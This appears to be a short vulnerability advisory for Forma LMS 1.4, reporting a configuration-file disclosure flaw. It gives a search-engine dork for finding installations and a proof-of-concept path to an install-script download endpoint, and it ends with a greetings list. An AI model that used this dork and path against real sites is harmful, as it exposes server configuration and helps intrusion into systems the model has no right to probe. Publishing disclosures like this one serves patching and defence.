Forma LMS version 1.4 suffers from a database disclosure vulnerability.
4ac4e0bad7d2a5dab1dbea6491156c0298d7d086895c6fd5cb2f8db0445100b9
====================================================================================================================================
| # Title : Forma lms v1.4 Database Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : http://www.formalms.org/ |
| # Dork : Copyright (c) forma.lms Powered by forma.lms CE |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Allow visitors to download the configuration file but without the database information.
[+] http://127.0.0.1/icsgboscotarantogovit/forma/install/download_conf.php
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================